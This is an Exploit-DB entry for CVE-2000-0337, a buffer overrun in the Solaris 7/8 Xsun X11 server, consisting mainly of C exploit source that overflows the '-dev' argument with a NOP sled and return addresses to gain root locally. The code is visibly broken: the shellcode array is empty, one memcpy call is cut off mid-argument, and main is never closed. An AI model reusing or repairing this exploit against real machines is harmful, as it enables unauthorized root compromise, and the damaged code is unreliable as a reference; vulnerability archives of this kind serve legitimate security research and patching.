Solaris 7.0/8 Xsun Buffer Overrun Vulnerability

ID EDB-ID:19876
Type exploitdb
Reporter DiGiT
Modified 2000-04-24T00:00:00


Solaris 7.0/8 Xsun Buffer Overrun Vulnerability. CVE-2000-0337. Local exploit for solaris platform


A buffer overrun vulnerability exists in the Xsun X11 server, as shipped as part of Solaris 7 and 8 from Sun Microsystems. By supplying a long argument to the -dev option (normally used to set the output device), it is possible to execute arbitrary code with setgid root permissions. This can be further leveraged to gain root privileges, resulting in machine compromise.

* Solaris 7  Xsun(suid) local overflow - PRIVATE for now!
* Solaris 2.7/(2.6?) x86 sploit no sparc code, yet!
* Discovered/sploited By DiGiT -
* Greets: #!ADM, #!

#include <stdio.h>
#include <stdlib.h>

// Generic solaris x86 shellcode by cheeze wizz

char shellcode[] =
long get_esp() { __asm__("movl %esp,%eax"); }

int main(int argc, char *argv[]) {

  char buff[5000];
  int nopcount=2001, bsize=4000, offset=1850;
  int i;

  if (argc > 1) nopcount  = atoi(argv[1]);
  if (argc > 2) bsize  = atoi(argv[2]);
  if (argc > 3) offset = atoi(argv[3]);
        memset (buff, 0x90, bsize); 

                for (i = nopcount; i < bsize - 4; i += 4)
                *(long *) &buff[i] = get_esp() + offset;
        memcpy (buff + (nopcount - strlen (shellcode)), shellcode, strlen
            memcpy (buff, ":", 1);
         printf("Oh boy. DiGiT presents r00t\n");

         execl("/usr/openwin/bin/Xsun", "Xsun", "-dev", buff, NULL);